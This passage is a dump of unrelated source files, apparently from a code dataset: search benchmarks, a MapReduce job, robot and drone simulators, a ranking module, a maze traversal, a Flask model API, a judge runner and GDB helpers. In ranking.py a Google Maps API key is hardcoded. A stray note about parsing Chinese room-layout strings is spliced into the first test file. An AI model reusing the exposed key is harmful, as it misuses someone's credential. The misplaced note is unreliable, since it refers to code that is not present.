cancellation\n for i in range(100):\n tr = gs.GIGASearch(X)\n tr.cancel_build()\n \n #test stability with search then cancellation\n for i in range(100):\n yw = np.random.normal(0., 1., 5)\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., 5)\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n tr = 
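The two str.extract calls above pull the room ('室') and hall ('厅') counts out of layout strings such as '2室1厅'; a quick standalone check of the patterns (values illustrative):

import pandas as pd

layouts = pd.Series(['2室1厅', '3室2厅'])
rooms = layouts.str.extract('(^\d).*', expand=False).astype('int64')        # 2, 3
halls = layouts.str.extract('^\d.*?(\d).*', expand=False).astype('int64')   # 1, 2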
gs.GIGASearch(X)\n tr.search(yw, y_yw)\n tr.cancel_build()\n \n #test stability with cancellation then search\n for i in range(100):\n yw = np.random.normal(0., 1., 5)\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., 5)\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n tr = gs.GIGASearch(X)\n tr.cancel_build()\n tr.search(yw, y_yw)\n \n #test stability with lots of searches\n tr = gs.GIGASearch(X)\n for i in range(100):\n yw = np.random.normal(0., 1., 5)\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., 5)\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n tr.search(yw, y_yw)\n\nif __name__ == '__main__':\n import time\n import sys\n import ctypes\n import pkgutil\n import os\n N = 10000000\n D = 20\n x = gendata(N, D, 'gauss')\n\n hcfn = pkgutil.get_loader('hilbertcoresets').filename\n libgs = ctypes.cdll.LoadLibrary(os.path.join(hcfn, 'libgigasearch.so'))\n libgs.search.argtypes = [ctypes.POINTER(ctypes.c_double), ctypes.POINTER(ctypes.c_double), ctypes.POINTER(ctypes.c_double), ctypes.c_uint, ctypes.c_uint]\n libgs.search.restype = ctypes.c_int\n for i in range(1000):\n yw = np.random.normal(0., 1., D)\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., D)\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n t0 = time.time()\n num = (x*y_yw).sum(axis=1)\n denom = (x*yw).sum(axis=1)\n denom = np.sqrt(1.-denom**2)\n n_ol = (num/denom).argmax()\n lin_time = time.time()-t0\n lin_n = N\n t0 = time.time() \n n_og = libgs.search(x.ctypes.data_as(ctypes.POINTER(ctypes.c_double)), yw.ctypes.data_as(ctypes.POINTER(ctypes.c_double)), y_yw.ctypes.data_as(ctypes.POINTER(ctypes.c_double)), x.shape[0], x.shape[1])\n #n_og = giga.search(yw, y_yw)\n gs_time = time.time()-t0\n gs_n = N\n sys.stderr.write(' gs_t: ' + str(gs_time) + ' lin_t: ' + str(lin_time) + ' gs_n: ' + str(n_og) + ' lin_n: ' + str(n_ol) + ' gs_n: ' + str(gs_n) + ' lin_n: ' + str(lin_n)+ '\\n')\n sys.stderr.flush()\n \n \n \n\n\n\n\n\n","sub_path":"tests/old_tst_gigasearch.py","file_name":"old_tst_gigasearch.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"203677903","text":"import MapReduce\nimport sys\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\n# final matrix size\nn = 5\nm = 5\n\ndef mapper(record):\n # key: matrix id\n # i: row\n # j: column\n # value: value\n key, i, j, value = record\n\n if (key == \"a\"):\n for k in range(m):\n mr.emit_intermediate((i, k), record)\n if (key == \"b\"):\n for k in range(n):\n mr.emit_intermediate((k, j), record)\n\ndef reducer(key, list_of_values):\n # key: (i,j)\n # value: list of records\n total = 0\n for record in list_of_values:\n # matrix: matrix\n # i: row\n # j: column\n # val: value\n matrix = record[0]\n i = record[1]\n j = record[2]\n val = record[3]\n if matrix == 'a':\n b_cell = [r for r in list_of_values if (r[0] == 'b' and r[1] == j)]\n if b_cell != []:\n total += val * b_cell[0][3]\n\n if total != 0:\n mr.emit((key[0], key[1], total))\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","sub_path":"assignment3/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"98531062","text":"import numpy as np\nfrom 
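Each benchmark trial above draws a random unit vector yw and then builds y_yw orthonormal to it, a single Gram-Schmidt step; the same three lines in isolation:

import numpy as np

yw = np.random.normal(0., 1., 5); yw /= np.sqrt((yw**2).sum())
y_yw = np.random.normal(0., 1., 5)
y_yw -= y_yw.dot(yw) * yw            # remove the component along yw
y_yw /= np.sqrt((y_yw**2).sum())     # renormalize to unit length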
gym import utils\nfrom gym.envs.mujoco import mujoco_env\n\nclass Arm3dDoorEnv(mujoco_env.MujocoEnv, utils.EzPickle):\n def __init__(self):\n self.target_doorpos = np.asarray([-0.08406698, -0.10218753, 0.3])\n self.target_handlepos = np.asarray([-0.01953642, -0.41961081, -0.25])\n utils.EzPickle.__init__(self)\n mujoco_env.MujocoEnv.__init__(self, 'pr2_arm3d_door.xml', 2)\n\n def viewer_setup(self):\n self.viewer.cam.trackbodyid = 0\n self.viewer.cam.distance = self.model.stat.extent * 2.0\n #self.viewer.cam.lookat[2] += .8\n self.viewer.cam.elevation = 0.\n\n def reset_model(self):\n qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos\n qvel = self.init_qvel\n self.set_state(qpos, qvel)\n return self._get_obs()\n\n def _step(self, a):\n vec1 = self.get_body_com(\"r_gripper_l_finger_tip_link\")-self.get_body_com(\"door_handle\")\n vec2 = self.get_body_com(\"door_handle\")-self.target_handlepos\n reward_dist = - np.linalg.norm(vec1+vec2)\n reward_ctrl = - np.square(a).sum()\n reward = reward_dist + reward_ctrl\n self.do_simulation(a, self.frame_skip)\n ob = self._get_obs()\n done = False\n return ob, reward, done, dict(reward_dist=reward_dist, reward_ctrl=reward_ctrl)\n\n def _get_obs(self):\n theta = self.model.data.qpos.flat[:6]\n return np.concatenate([\n np.cos(theta),\n np.sin(theta),\n self.model.data.qpos.flat[6:],\n self.model.data.qvel.flat[:6],\n self.get_body_com(\"r_gripper_l_finger_tip_link\")-self.get_body_com(\"door_handle\"),\n self.get_body_com(\"door_handle\")-self.target_handlepos\n\n ])\n\n'''\n#0.16134199 -0.37169818 0.25\n\n#-0.01953642 -0.41961081 door handle pos\n# -0.08406698 -0.10218753 door pos\nif __name__ == \"__main__\":\n env = Arm3dDoor()\n print (env.model.data.qpos.flat[:].shape)\n print (env.action_space)\n \"\"\"\n import time\n env = Arm3dDoor()\n env.reset()\n\n print (env.action_space)\n episode_i = 0\n \"\"\"\n\n while True:\n env.reset()\n env.render()\n \"\"\"\n print (\"episode {}\".format(episode_i))\n print ('orig')\n print (env.get_body_com(\"door_handle\"))\n print (env.get_body_com(\"door\"))\n\n for _ in range(150):\n env.render()\n #action = np.random.uniform(low=-2,high=2,size=env.action_space.shape)\n action = np.zeros(env.action_space.shape)\n #action[-1] = 0.\n #action[-1] = 0\n env.step(action)\n print ('end')\n print (env.get_body_com(\"door_handle\"))\n print (env.get_body_com(\"door\"))\n\n episode_i += 1\n time.sleep(1)\n \"\"\"\n'''\n","sub_path":"gym/envs/mujoco/arm3d_door.py","file_name":"arm3d_door.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"232631478","text":"import math\n\n#Drone class\n#Needs the env object passed into on initialization for environment reference\nclass Drone:\n def __init__(self, env, pos):\n self.env = env\n\n if (pos != None):\n self.pos = [pos[0], pos[1]]\n else:\n self.pos = [0, 0]\n\n self.time = 0\n\n self.hopper = []\n self.hopperSize = (int)(math.floor(pow(pow(self.env.getSize(), 3), 0.5)/2))\n self.lastColour = \"\"\n\n self.memory = []\n #Initializing drone's memory of environment to zero\n for i in range(self.env.getSize()):\n toAddi = []\n for j in range(self.env.getSize()):\n toAddj = []\n for k in range(self.env.getSize()):\n toAddj.append(None)\n toAddi.append(toAddj)\n self.memory.append(toAddi)\n\n #Moves the drone in a given direction, updates the time taken\n def move(self, direction): #0 is up, 1 is right, 2 is down, 3 is left\n if (direction == 0):\n 
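Arm3dDoorEnv._step above scores each step as a distance term plus a control penalty, reward = -||vec1 + vec2|| - sum(a**2); restated as a standalone function:

import numpy as np

def door_reward(vec1, vec2, action):
    reward_dist = -np.linalg.norm(vec1 + vec2)   # gripper-to-handle plus handle-to-target error
    reward_ctrl = -np.square(action).sum()       # penalize large torques
    return reward_dist + reward_ctrl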
if self.pos[1] >= self.env.getSize() - 1:\n                return None\n            self.pos[1] += 1\n        elif (direction == 1):\n            if self.pos[0] >= self.env.getSize() - 1:\n                return None\n            self.pos[0] += 1\n        elif (direction == 2):\n            if self.pos[1] <= 0:\n                return None\n            self.pos[1] += -1\n        elif (direction == 3):\n            if self.pos[0] <= 0:\n                return None\n            self.pos[0] += -1\n        else:\n            print(\"invalid direction\")\n        self.time += 1\n        self.scan()\n        return True\n    def moveTo(self, target):\n        xDiff = target[0] - self.pos[0]\n        yDiff = target[1] - self.pos[1]\n        for i in range(abs(xDiff)):\n            if (xDiff < 0):\n                self.move(3)\n            else:\n                self.move(1)\n        for i in range(abs(yDiff)):\n            if (yDiff < 0):\n                self.move(2)\n            else:\n                self.move(0)\n\n    #Picks up a block in the environment at the current position, updates time\n    def pickUp(self):\n        if (len(self.hopper) < self.hopperSize): #if there is room in the hopper, pick up block\n            toAdd = self.env.takeBlock(self.pos[0], self.pos[1]) # (colour, z)\n            if (toAdd == None): # if there is an error exit\n                return None\n\n            self.hopper.append(toAdd[0]) #store the block's colour in the hopper\n\n            #Update time\n            newColour = toAdd[0]\n            if (newColour == self.lastColour):\n                self.time += 2\n            else:\n                self.time += 3\n\n            self.lastColour = newColour\n            self.memory[self.pos[0]][self.pos[1]][toAdd[1]] = None #forget the block that was just removed\n            self.scan() #rescan so memory reflects the new top block\n            return True\n\n    #Drops off a block in the environment at the current position at a given z value\n    def dropOff(self, colour, z):\n        toRemove = None\n        inHopper = False\n        for i in self.hopper: #block needs to be in hopper to drop off\n            if (i == colour):\n                toRemove = i\n                inHopper = True\n                break\n        if (inHopper == False): #If the block is not in the hopper\n            return None\n        self.hopper.remove(toRemove) #Remove block from hopper\n\n        newZ = z\n        if (z == -1):\n            newZ = self.env.blockAt(self.pos[0], self.pos[1])[1] + 1\n        if (newZ >= self.env.getSize()):\n            return True\n        #Add block to env and memory (exactly once)\n        test = self.env.addBlock(self.pos[0], self.pos[1], (toRemove, newZ))\n\n        if (test == None):\n            print(\"add block failed\")\n            return None\n\n        #Update time\n        if (colour == self.lastColour):\n            self.time += 2\n        else:\n            self.time += 3\n\n        self.lastColour = colour\n        self.memory[self.pos[0]][self.pos[1]][newZ] = toRemove\n        self.scan()\n        return True\n    \n    #Scans the block below the drone\n    def scan(self):\n        block = self.env.blockAt(self.pos[0], self.pos[1])\n        if block is not None:\n            self.memory[self.pos[0]][self.pos[1]][block[1]] = block[0]\n        return block\n\n    def isHopperFull(self):\n        return len(self.hopper) >= self.hopperSize\n\n    def getHopperColours(self):\n        out = []\n        for i in self.hopper:\n            if (i not in out):\n                out.append(i)\n        return out\n","sub_path":"drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"641401812","text":"# Testing Methods and Attributes\r\n# class Fruit:\r\n#     food_type = \"Fruit\"\r\n\r\n#     def __init__(self, flavor, grows_on, color, name):\r\n#         self.flavor = flavor\r\n#         self.grows_on = grows_on\r\n#         self.color = color\r\n#         # adding one more attribute\r\n#         self.name = name\r\n\r\n#     def ripen(self):\r\n#         print(f\"The {self.name} ripens, becoming a vibrant {self.color}, and has a delicious {self.flavor} flavor. 
You may now pick it from the {self.grows_on}\")\r\n\r\n# my_fruit = Fruit(\"sweet\", \"tree\", \"red\", \"cherry\")\r\n# your_fruit = Fruit(\"sweet\", \"tree\", \"yellow\", \"banana\")\r\n\r\n# my_fruit.ripen()\r\n# your_fruit.ripen()\r\n\r\n# Testing class and static methods\r\nclass Fruit:\r\n food_type = \"Fruit\"\r\n all_fruits = []\r\n\r\n def __init__(self, flavor, grows_on, color, name):\r\n self.flavor = flavor\r\n self.grows_on = grows_on\r\n self.color = color\r\n self.name = name\r\n Fruit.all_fruits.append(self)\r\n\r\n def ripen(self):\r\n print(f\"The {self.name} ripens, becoming a vibrant {self.color}, and has a delicious {self.flavor} flavor. You may now pick it from the {self.grows_on}\")\r\n\r\n @classmethod\r\n def get_all_fruits(cls):\r\n for fruit in cls.all_fruits:\r\n print(fruit.name)\r\n # print(f\"This was called from {cls.name}\") <- this will not work since this is a class method, not an instance method\r\n\r\n @staticmethod\r\n # but unlike the class method, it doesn't get any arguments referring to the class or object itself\r\n def remove_fruit(name, list_of_fruit):\r\n for i in range(len(list_of_fruit)):\r\n if list_of_fruit[i].name == name:\r\n list_of_fruit.pop(i)\r\n\r\n\r\nmy_fruit = Fruit(\"sweet\", \"bush\", \"red\", \"strawberry\")\r\nyour_fruit = Fruit(\"sweet\", \"tree\", \"yellow\", \"banana\")\r\nmy_fruit.ripen()\r\nmy_fruit.get_all_fruits()\r\n\r\n\r\nFruit.remove_fruit(\"banana\", Fruit.all_fruits)\r\n\r\nFruit.get_all_fruits()\r\n","sub_path":"2.Python/00.letcures/02.Object_Oriented_Programming/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"519038700","text":"from exceptions import BaseException\n\nclass FileDoesNotExistError(BaseException):\n file_path = None\n message = 'the file \"{file_path}\" does not exist.'\n\n def __init__(self, file_path):\n self.file_path = file_path\n\nclass DirectoryDoesNotExistError(BaseException):\n directory_path = None\n message = 'the directory \"{directory_path}\" does not exist.'\n\n def __init__(self, directory_path):\n self.directory_path = directory_path\n","sub_path":"exceptions/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"536103027","text":"import json, collections, googlemaps\nfrom lib.user import User\nfrom lib.place import Place\n\ngmaps = googlemaps.Client(key='AIzaSyATLldaqdgJdoExvEgme-93h6fuael2ae4')\n\n# Goal is what the user selected from the dropdown menu\n# Appropriate fairness function is called accordingly\ndef getRanking(places, goal):\n if goal == \"min-durations\":\n minimiseDurations(places)\n elif goal == \"min-distances\":\n minimiseDistances(places)\n elif goal == \"most-similar-durations\":\n places = mostSimilarDurations(places)\n elif goal == \"reasonably-similar-durations\":\n places = reasonablySimilarDurations(places)\n elif goal == \"duration-fair-similarity\":\n durationFairnessFunction(places, 3/4, 1/4)\n elif goal == \"duration-fair-total\":\n durationFairnessFunction(places, 1/4, 3/4)\n\n # Top ten results returned to server\n return places[0:10]\n\n\ndef minimiseDurations(places):\n # Sort in ascending order by minimum duration\n places.sort(key=lambda place: place.get_min_duration())\n # Sort in ascending order by maximum duration\n places.sort(key=lambda place: place.get_max_duration())\n # Sort in ascending 
order by total duration\n places.sort(key=lambda place: place.get_total_duration())\n\n\ndef minimiseDistances(places):\n # Sort in ascending order by minimum distance\n places.sort(key=lambda place: place.get_min_distance())\n # Sort in ascending order by maximum distance\n places.sort(key=lambda place: place.get_max_distance())\n # Sort in ascending order by total distance\n places.sort(key=lambda place: place.get_total_distance())\n\n\ndef mostSimilarDurations(places):\n # Sort in ascending order by total deviation\n places.sort(key=lambda place: place.get_duration_deviation())\n # Keep track of current deviation bracket\n current_deviation = 0\n sorted_places = []\n temp_places = []\n for place in places:\n if (place.get_duration_deviation() == current_deviation):\n # Collect all the places in a deviation bracket together\n temp_places.append(place)\n else:\n # Once they have all been collected, sort in ascending order\n # by minimum duration then maximum duration\n temp_places.sort(key=lambda place: place.get_min_duration())\n temp_places.sort(key=lambda place: place.get_max_duration())\n # Store the sorted list\n sorted_places.extend(temp_places)\n # Restart and repeat for the next deviation bracket\n temp_places = []\n current_deviation = place.get_duration_deviation()\n temp_places.append(place)\n # Sort the final temporary list\n temp_places.sort(key=lambda place: place.get_min_duration())\n temp_places.sort(key=lambda place: place.get_max_duration())\n sorted_places.extend(temp_places)\n # Return the final sorted list of places\n return sorted_places\n\n\n# Locations are ordered within their deviation brackets\ndef reasonablySimilarDurations(places):\n # Sort in ascending order by total deviation\n places.sort(key=lambda place: place.get_duration_deviation())\n # The range of the deviation bracket\n step = 10\n current_deviation_lower = 0\n current_deviation_upper = current_deviation_lower + step\n sorted_places = []\n temp_places = []\n for place in places:\n if (current_deviation_lower <= place.get_duration_deviation() <= current_deviation_upper):\n temp_places.append(place)\n else:\n temp_places.sort(key=lambda place: place.get_min_duration())\n temp_places.sort(key=lambda place: place.get_max_duration())\n sorted_places.extend(temp_places)\n temp_places = []\n current_deviation = place.get_duration_deviation()\n while current_deviation >= current_deviation_upper:\n current_deviation_lower = current_deviation_upper\n current_deviation_upper += step\n temp_places.append(place)\n temp_places.sort(key=lambda place: place.get_min_duration())\n temp_places.sort(key=lambda place: place.get_max_duration())\n sorted_places.extend(temp_places)\n return sorted_places\n\n\n# The fairness functions are applied\ndef durationFairnessFunction(places, alpha, beta):\n for place in places:\n total_deviation = place.get_duration_deviation()\n total_duration = place.get_total_duration()\n score = (alpha * total_deviation) + (beta * total_duration)\n place.set_duration_fairness_score(score)\n places.sort(key=lambda place: place.get_duration_fairness_score())\n\n","sub_path":"lib/ranking.py","file_name":"ranking.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"628603572","text":"from room import Room\nfrom player import Player\nfrom world import World\n\nimport random\nfrom ast import literal_eval\n\n# Load world\nworld = World()\n\n\n# You may uncomment the smaller graphs for development and 
 testing purposes.\n# map_file = \"maps/test_line.txt\"\n# map_file = \"maps/test_cross.txt\"\n# map_file = \"maps/test_loop.txt\"\n# map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph=literal_eval(open(map_file, \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\n\nplayer = Player(world.starting_room)\n\n# Fill this out with directions to walk\n# traversal_path = ['n', 'n']\n\n#for the path that's been traversed\ntraversal_path = []\n\n#dict for all rooms visited\nvisited = {}\n\n#path needed for keeping track of going back if get stuck\nback_path = []\n\n#we need to be able to go in the opposite direction if we run into a dead end and need to go back so we can keep exploring\nopp_dir = {'n':'s', 's':'n', 'w': 'e', 'e':'w'}\n\n#get current room id and the exits available\n#prints {0: ['n', 's', 'w', 'e']}\nvisited[player.current_room.id] = player.current_room.get_exits()\n\nprint(\"Starting search!\")\n\n#1) Find shortest path to an unexplored room\n#run while loop to check if visited is less than rooms available \nwhile len(visited) < len(room_graph) - 1:\n\n    #check if the current room the player is in hasn't been added to visited\n    if player.current_room.id not in visited:\n\n        #add exits of the current room to rooms\n        visited[player.current_room.id] = player.current_room.get_exits()\n\n        #grab the last direction that was traveled \n        last_direction = back_path[-1]\n\n        #remove the last traveled direction from the previous room, so that new ones can be added with each room visit\n        visited[player.current_room.id].remove(last_direction)\n        print(f\"Available directions: {visited[player.current_room.id]}\")\n        print(f\"Current room id: {player.current_room.id} \\n\")\n\n\n\n    #2) Then find more available rooms \n\n    #check if no more available rooms to visit or no more directions to go in (could be because of hitting dead end)\n    while len(visited[player.current_room.id]) < 1:\n        print(f\"Available directions: {visited[player.current_room.id]}\")\n        #if so, then go back by popping it from the path \n        print(\"\\nGoing back!\")\n        back_dir = back_path.pop()\n\n        print(f\"Current room id: {player.current_room.id}\")\n\n        #append the back direction to traversal_path so it can travel in that direction (we're able to find room with an available direction to travel)\n        traversal_path.append(back_dir)\n        print(f\"Traveling {traversal_path[-1]} to take you back a room\")\n\n        #now we need to give the player the ability to travel in that direction\n        player.travel(back_dir)\n\n\n\n    #while there are avail. directions, go in the first direction avail. in room\n    find_exit = visited[player.current_room.id].pop(0)\n\n    # print(f\"Current room id: {player.current_room.id}\")\n    print(f\"Current room: {player.current_room.id} Going in this direction to find an exit :{find_exit}\")\n\n    #add these directions to traversal path\n    traversal_path.append(find_exit)\n\n    #append the opposite direction to the path used for backtracking\n    back_path.append(opp_dir[find_exit])\n    print(f\"Opposite direction of current direction: {opp_dir[find_exit]} \\n\")\n\n    #move the player to find the exit\n    player.travel(find_exit)\n\n\n# print(world.print_rooms())\nprint(\"Congratulations, you're done!\\n\\n\")\n\n\n\n#Write algo that picks random unexplored direction from current_room\n#travels and logs that direction\n#loop\n#should cause player to walk in dft(?)\n\n#Can find the path to shortest unexplored room by using bfs for a room with ? 
 for an exit\n#If using bfs from homework make modifications\n#Instead of searching for target vertex, search for an exit with a ? as the value\n#If exit has been explored, \n    #can put it in bfs queue like normal\n#Bfs will return the path as a list of room IDs\n    #Will need to convert this to a list of n/s/e/w directions before you can add it to your traversal path\n#If all paths explored, done\n\n#DFT until a dead end is reached\n#BFS to the nearest unexplored room\n\n\n\n\n\n\n# TRAVERSAL TEST\nvisited_rooms = set()\nplayer.current_room = world.starting_room\nvisited_rooms.add(player.current_room)\n\nfor move in traversal_path:\n    player.travel(move)\n    visited_rooms.add(player.current_room)\n\nif len(visited_rooms) == len(room_graph):\n    print(f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n    print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n    print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\n# player.current_room.print_room_description(player)\n# while True:\n#     cmds = input(\"-> \").lower().split(\" \")\n#     if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n#         player.travel(cmds[0], True)\n#     elif cmds[0] == \"q\":\n#         break\n#     else:\n#         print(\"I did not understand that command.\")\n","sub_path":"adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"389580014","text":"def main():\n    print(\"POSITIVE NUMBERS\")\n    numeros=int(input(\"Enter how many numbers you will type: \"))\n    positivos=0\n    negativos=0\n    while numeros<=0:\n        numeros=int(input(\"The amount must be greater than 0. Try again: \"))\n\n    for _ in range(1, numeros+1):\n        numero=int(input(\"Enter a number: \"))\n\n        if numero>0:\n            positivos=positivos+1\n        else:\n            negativos=negativos+1\n    if negativos==0:\n        print(f\"You typed {positivos} positive numbers\")\n    elif positivos==0:\n        print(f\"You typed {negativos} negative numbers\")\n    else:\n        print(f\"You typed {positivos} positive numbers and {negativos} negative numbers out of a total of {numeros}\")\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"bucle while 1/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"274532801","text":"import json\nimport logging\nfrom flask import Flask, request, jsonify\n\nfrom sgnlp.models.lif_3way_ap import LIF3WayAPModel, LIF3WayAPConfig, LIF3WayAPPreprocessor\nfrom transformers import cached_path\n\napp = Flask(__name__)\n\ngunicorn_logger = logging.getLogger('gunicorn.error')\napp.logger.handlers = gunicorn_logger.handlers\napp.logger.setLevel(gunicorn_logger.level)\n\n# Load model\nconfig = LIF3WayAPConfig.from_pretrained('https://sgnlp.blob.core.windows.net/models/lif_3way_ap/config.json')\nmodel = LIF3WayAPModel.from_pretrained('https://sgnlp.blob.core.windows.net/models/lif_3way_ap/pytorch_model.bin',\n                                       config=config)\nmodel.eval()\n\n# Load preprocessor\nword_vocab_path = cached_path('https://sgnlp.blob.core.windows.net/models/lif_3way_ap/word_vocab.pt')\nchar_vocab_path = cached_path('https://sgnlp.blob.core.windows.net/models/lif_3way_ap/char_vocab.pt')\n\npreprocessor = LIF3WayAPPreprocessor(min_word_padding_size=config.char_embedding_args[\"kernel_size\"])\npreprocessor.load_vocab(word_vocab_path, char_vocab_path)\n\napp.logger.info('Initialization
 complete.')\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n    req_body = request.get_json()\n    tensor_dict = preprocessor([req_body])\n    output = model(**tensor_dict)\n    return {\"probability\": output[\"label_probs\"].item()}\n\n\nmodel_card_path = \"model_card/lif_3way_ap.json\"\n\n\n@app.route(\"/model-card\", methods=[\"GET\"])\ndef get_model_card():\n    \"\"\"GET method for model card\n\n    Returns:\n        json: return model card in json format\n    \"\"\"\n    with open(model_card_path) as f:\n        model_card = json.load(f)\n    return jsonify(**model_card)\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0')\n","sub_path":"demo_api/lif_3way_ap/model_api.py","file_name":"model_api.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"83101685","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport sandbox\nimport file\nimport langSupport\nfrom judge import JudgeResult\n\ndef OJRun():\n    lPlayers = file.listOfPlayers()\n    lProblems = file.listOfProblems()\n\n    for thisPlayer in lPlayers:\n        relaPath = file.getPlayerDirectory(thisPlayer)\n        if not os.path.isdir(relaPath):\n            print(\"Ignored %s: Not a directory.\" % thisPlayer)\n            continue\n        lSources = file.listOfPlayerSources(thisPlayer)\n        for thisSource in lSources:\n            sourceRelaPath = relaPath + thisSource\n            filename, fileExtension = os.path.splitext(thisSource)\n            if not os.path.isfile(sourceRelaPath):\n                print(\"Ignored %s: Not a file.\" % sourceRelaPath)\n                continue\n            elif not langSupport.langType(fileExtension.lower()):\n                print(\"Ignored %s: Unsupported file extension.\" % sourceRelaPath)\n                continue\n            elif filename not in lProblems:\n                print(\"Ignored %s: Cannot find Problem %s.\" % (sourceRelaPath, filename))\n                continue\n            config = file.loadProblemConfig(filename)\n            res = sandbox.safeJudge(filename, fileExtension, relaPath, config)\n            print('{} on {}: {}'.format(thisPlayer, config['title'], res))\n\ndef OJReset():\n    file.cleanupWorkspace()\n\nif __name__ == '__main__':\n    if len(sys.argv) >= 2:\n        if sys.argv[1] == 'cleanup':\n            OJReset()\n            exit(0)\n    OJRun()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"401529644","text":"import pandas as pd\npd.set_option('display.max_rows', 500)\n\n#Parse my input file\nclass Parse:\n    #Open File ##To Do: Find out how to take in multiple files for scalability\n    @staticmethod\n    def open_file(file_name):\n        with open(file_name, 'r', encoding='utf-8', errors=\"replace\") as file:\n            df = pd.read_csv(file) #read from the already-open handle so errors=\"replace\" applies\n\n            # Timestamp ##For right now, this converts all timezones to est.
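\n            # A hedged sketch for the open question noted below (my assumption, not the\n            # author's code): only localize when the parsed column came back tz-naive,\n            # using pandas' Series.dt.tz accessor, so rows that carried an offset keep it.\n            # if df['Timestamp'].dt.tz is None:\n            #     df['Timestamp'] = df['Timestamp'].dt.tz_localize('UTC').dt.tz_convert('EST')\n            #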
need to learn how to only do missing timezone info\n df['Timestamp'] = pd.to_datetime(df['Timestamp'])\n df['Timestamp'] = df['Timestamp'].dt.tz_localize('UTC')\n df['Timestamp'] = df['Timestamp'].dt.tz_convert('EST')\n\n # Converts ZIP(zipcodes) to 5 digits with leading Zeros\n df['ZIP'] = df['ZIP'].apply(lambda x: '{0:0>5}'.format(x))\n\n # Converts FullName to Uppercase\n df['FullName'] = df['FullName'].str.upper()\n\n #To do: Remove Quotes in Address\n #df['Address'] = df['Address'].apply(lambda x: x.replace('\"', ''))\n #df['Address'] = df['Address'].str.replace('\"\"', '')\n\n #To Do: FooDuration & BarDuration to floating seconds\n\n #To Do: Remove Total Duration = Sum of FooDuration & BarDuration\n\n #Write File ##To Do: Make output file match input file name\n df.to_csv('out.csv', index=False)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"576298383","text":"\"\"\"\nAssorted utilities for HHVM GDB bindings.\n\"\"\"\n# @lint-avoid-python-3-compatibility-imports\n# @lint-avoid-pyflakes3\n# @lint-avoid-pyflakes2\n\nimport collections\nimport functools\nimport gdb\n\n\n#------------------------------------------------------------------------------\n# Memoization.\n\ndef memoized(func):\n \"\"\"Simple memoization decorator that ignores **kwargs.\"\"\"\n\n cache = {}\n\n @functools.wraps(func)\n def memoizer(*args):\n if not isinstance(args, collections.Hashable):\n return func(*args)\n if args not in cache:\n cache[args] = func(*args)\n return cache[args]\n return memoizer\n\n\n#------------------------------------------------------------------------------\n# General-purpose helpers.\n\ndef parse_argv(args):\n return [gdb.parse_and_eval(arg) for arg in gdb.string_to_argv(args)]\n\n\ndef gdbprint(val, ty=None):\n if ty is None:\n ty = val.type\n gdb.execute('print (%s)%s' % (str(ty), str(val)))\n\n\n#------------------------------------------------------------------------------\n# String helpers.\n\n\ndef string_data_val(val):\n return val['m_data'].string('utf-8', 'ignore', val['m_len'])\n\n\ndef vstr(value):\n \"\"\"Stringify a value without pretty-printing.\"\"\"\n\n for pp in gdb.pretty_printers:\n try:\n pp.saved = pp.enabled\n except AttributeError:\n pp.saved = True\n\n pp.enabled = False\n\n try:\n ret = 